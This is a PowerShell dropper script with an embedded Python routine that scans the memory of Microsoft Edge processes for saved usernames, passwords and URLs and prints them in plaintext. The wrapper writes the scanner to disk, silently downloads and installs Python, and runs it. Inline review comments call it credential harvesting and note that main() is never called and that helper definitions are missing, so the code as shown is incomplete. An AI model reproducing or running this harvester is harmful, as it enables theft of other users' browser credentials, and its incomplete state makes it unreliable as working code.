| $pythonCode = @' | |
| def main() -> None: | |
| """Scan the memory of "root" msedge.exe processes for credential-looking strings and print them. | |
| Flow: list processes with psutil and keep msedge.exe entries whose parent is not itself msedge.exe; | |
| open each with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ; walk every committed PAGE_READWRITE | |
| region with VirtualQueryEx/ReadProcessMemory; split the decoded text on line breaks and apply two | |
| regexes that expect "<letter>http(s) <user> <password> <NUL>" with a URL-ish prefix before it; | |
| print "<user> : <password> @<prefix>" once per process, then a total line. | |
| NOTE(review): this is a credential-harvesting routine that reads other processes' memory and | |
| writes recovered secrets to stdout in plaintext. Reading processes owned by other users typically | |
| requires SeDebugPrivilege/administrator rights; the original author notes the admin check was | |
| removed, so the only signal of insufficient privilege is the "Failed to open process" line below. | |
| Run it only within an explicitly authorized engagement scope and treat its output as sensitive. | |
| Depends on names defined outside this function (psutil, ctypes, re, kernel32, ProcessInfo, | |
| get_process_owner_from_token, MEMORY_BASIC_INFORMATION, MEM_COMMIT, PAGE_READWRITE, PROCESS_*). | |
| The here-string as shown contains none of those definitions, no imports and no call to main(), | |
| so running wp.py as shown only defines main() and exits; calling it would raise NameError unless | |
| those names are supplied - presumably the page is truncated; verify against the full file. | |
| Returns None; all output goes through print(). | |
| """ | |
| # Admin-privilege check deliberately skipped (original author's note); OpenProcess failures are reported per process instead | |
| print("\033[92m[v]\033[0m Starting script execution\n") | |
| print("Fetching browser processes:", end="", flush=True) | |
| total_matches = 0 | |
| shown_matches = 0 # incremented together with total_matches below, so the two counters are always equal | |
| seen_strings = set() # per-process dedup of printed hits; cleared after each process | |
| already_checked_users = set() # "<owner> <name>" keys; a key is only added after a hit (see below) | |
| process_list = [] | |
| # Get all msedge.exe processes | |
| for proc in psutil.process_iter(['pid', 'name', 'ppid']): | |
| try: | |
| if proc.info['name'] and proc.info['name'].lower() == 'msedge.exe': | |
| pid = proc.info['pid'] | |
| parent_pid = proc.info['ppid'] | |
| skip = False | |
| # Check what process is parent | |
| try: | |
| parent = psutil.Process(parent_pid) | |
| if parent.name().lower() == 'msedge.exe': | |
| skip = True # Parent is msedge.exe → skip this child process | |
| except (psutil.NoSuchProcess, psutil.AccessDenied): | |
| pass # Parent may have exited → treat as root process | |
| if skip: | |
| continue | |
| # The credentials are only stored at root/parent msedge.exe processes | |
| owner = get_process_owner_from_token(pid) # helper defined elsewhere; presumably returns a "DOMAIN\user"-style string - confirm | |
| process_list.append(ProcessInfo(pid, proc.info['name'], owner)) # ProcessInfo exposes .Id/.Name/.Owner (used below) | |
| except (psutil.NoSuchProcess, psutil.AccessDenied): | |
| continue | |
| print(" Done.\n") | |
| for proc in process_list: | |
| user_process_key = f"{proc.Owner} {proc.Name}" | |
| if user_process_key in already_checked_users: | |
| continue | |
| # Strip a hard-coded "NSC\t1_" account prefix for display only; proc.Owner itself is unchanged | |
| owner = proc.Owner.replace("NSC\\t1_", "") | |
| print(f"Scanning process PID: {proc.Id}\tName: {proc.Name}\tOwner: {owner}") | |
| process_handle = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, proc.Id) | |
| if not process_handle: | |
| # Typically a privilege problem (another user's process without SeDebugPrivilege); reported, not fatal | |
| print(f"Failed to open process: {proc.Id} {proc.Name} {proc.Owner}") | |
| continue | |
| # Fix (original): start the VirtualQueryEx walk at address 0 | |
| address = ctypes.c_void_p(0) | |
| while True: | |
| mem_info = MEMORY_BASIC_INFORMATION() | |
| result = kernel32.VirtualQueryEx( | |
| process_handle, | |
| address, | |
| ctypes.byref(mem_info), | |
| ctypes.sizeof(MEMORY_BASIC_INFORMATION) | |
| ) | |
| if result == 0: | |
| break # no further regions (or the query failed) | |
| # Only committed, plain read/write regions are scanned; other protections are skipped | |
| readable = (mem_info.State == MEM_COMMIT and mem_info.Protect == PAGE_READWRITE) | |
| if readable and mem_info.BaseAddress is not None: | |
| region_size = mem_info.RegionSize | |
| try: | |
| # The whole region is buffered at once; very large regions fail here and are skipped | |
| buffer = ctypes.create_string_buffer(region_size) | |
| except (OverflowError, MemoryError): | |
| # Could not allocate a buffer for this region: advance past it and continue | |
| address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize) | |
| continue | |
| bytes_read = ctypes.c_size_t(0) | |
| if kernel32.ReadProcessMemory( | |
| process_handle, | |
| mem_info.BaseAddress, | |
| buffer, | |
| region_size, | |
| ctypes.byref(bytes_read) | |
| ): | |
| try: | |
| # errors='ignore' does not raise on undecodable bytes, so the latin-1 fallback below is in practice unreachable | |
| utf8_data = buffer.raw[:bytes_read.value].decode('utf-8', errors='ignore') | |
| except Exception: | |
| try: | |
| utf8_data = buffer.raw[:bytes_read.value].decode('latin-1', errors='ignore') | |
| except Exception: | |
| utf8_data = "" | |
| if utf8_data: | |
| # Split on line breaks only; NUL bytes stay inside the lines and serve as anchors for the regexes | |
| lines = re.split(r'\r\n|\r|\n', utf8_data) | |
| for line in lines: | |
| if len(line) < 1: # skip empty lines | |
| continue | |
| # "<letter>http(s) <user 3-20 chars> <password 6-40 chars> <NUL>"; rebuilt per line (re's cache avoids recompiling) | |
| pattern = r'[a-zA-Z]https?\x20([a-zA-ZæøåÆØÅ0-9\\\-_.@\?]{3,20})\x20([a-zA-ZæøåÆØÅ0-9#!@#\$%\^&\*\(\)_\-\+=\{\}\[\]:;<>\?/~\s]{6,40})\x20\x00' | |
| try: | |
| matches = re.finditer(pattern, line) | |
| except Exception: | |
| continue | |
| for match in matches: | |
| try: | |
| username = match.group(1) | |
| password = match.group(2) | |
| potential_pattern = f"{username} : {password}" | |
| # Second pass: capture the run of URL characters between three NULs and the "http(s) <user> <password>" hit | |
| url_pattern = ( | |
| r'\x00\x00\x00' | |
| r'([A-Za-z0-9\-._~:/?#\[\]@!$&\'()*+,;=%]+)' | |
| r'(https?)' | |
| + re.escape(f'\x20{username} {password}') | |
| ) | |
| for url_match in re.finditer(url_pattern, line): | |
| value = url_match.group(1) | |
| combined = f"{potential_pattern} @{value}" | |
| if combined not in seen_strings: | |
| print(combined) # plaintext credential on stdout | |
| seen_strings.add(combined) | |
| shown_matches += 1 | |
| total_matches += 1 | |
| # Only marked after a hit, so an owner/name pair with no hits is scanned again for every matching process | |
| already_checked_users.add(user_process_key) | |
| except Exception: | |
| continue # swallows any error for this match (including from print); nothing is logged | |
| # Fix (original): advance to the next region; stop if BaseAddress/RegionSize are missing | |
| if mem_info.BaseAddress is not None and mem_info.RegionSize is not None: | |
| address = ctypes.c_void_p(mem_info.BaseAddress + mem_info.RegionSize) | |
| else: | |
| break | |
| kernel32.CloseHandle(process_handle) # not in a finally: an uncaught exception above would leak the handle | |
| seen_strings.clear() # dedup is per process, so the same credential can be printed once per process | |
| print(f"\nTotal matches found across all processes: {total_matches}. {shown_matches} shown.") | |
| '@ | |
| # Drop the embedded scanner to disk as wp.py. The path is relative, so the file lands in whatever | |
| # directory the script is invoked from, and nothing in this script removes it afterwards. | |
| $pyFile = "wp.py" | |
| Set-Content -Path $pyFile -Value $pythonCode -Encoding UTF8 | |
| Write-Host "Saved: $pyFile" | |
| # ===== Locate a Python interpreter (python3 first, then python) ===== | |
| $pythonCmd = $null | |
| if (Get-Command python3 -ErrorAction SilentlyContinue) { | |
| $pythonCmd = "python3" | |
| } | |
| elseif (Get-Command python -ErrorAction SilentlyContinue) { | |
| $pythonCmd = "python" | |
| } | |
| # ===== Auto-install Python when no interpreter is found ===== | |
| # NOTE(review): the installer is fetched over HTTPS but neither a pinned hash nor its Authenticode | |
| # signature is checked before it is executed, and it runs as a silent all-users install | |
| # (InstallAllUsers=1), which typically needs elevation. The downloaded file is left in %TEMP%. | |
| if (-not $pythonCmd) { | |
| Write-Host "Python not found. Downloading..." | |
| $installer = "$env:TEMP\python-installer.exe" | |
| Invoke-WebRequest ` | |
| -Uri "https://www.python.org/ftp/python/3.12.3/python-3.12.3-amd64.exe" ` | |
| -OutFile $installer | |
| Write-Host "Installing Python..." | |
| Start-Process ` | |
| -FilePath $installer ` | |
| -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1" ` | |
| -Wait | |
| # Rebuild PATH from the Machine and User registry values so the fresh install is visible in this session | |
| $env:Path = [System.Environment]::GetEnvironmentVariable( | |
| "Path", | |
| "Machine" | |
| ) + ";" + [System.Environment]::GetEnvironmentVariable( | |
| "Path", | |
| "User" | |
| ) | |
| # Re-check after the install | |
| if (Get-Command python3 -ErrorAction SilentlyContinue) { | |
| $pythonCmd = "python3" | |
| } | |
| elseif (Get-Command python -ErrorAction SilentlyContinue) { | |
| $pythonCmd = "python" | |
| } | |
| if (-not $pythonCmd) { | |
| Write-Error "Python installation failed." | |
| exit 1 | |
| } | |
| } | |
| # ===== Run the dropped script with the interpreter found above ===== | |
| # NOTE(review): the here-string as shown only defines main() and never calls it, so this invocation | |
| # would exit without scanning unless the embedded script is longer than what this page shows. | |
| Write-Host "Running wp.py with $pythonCmd" | |
| & $pythonCmd $pyFile |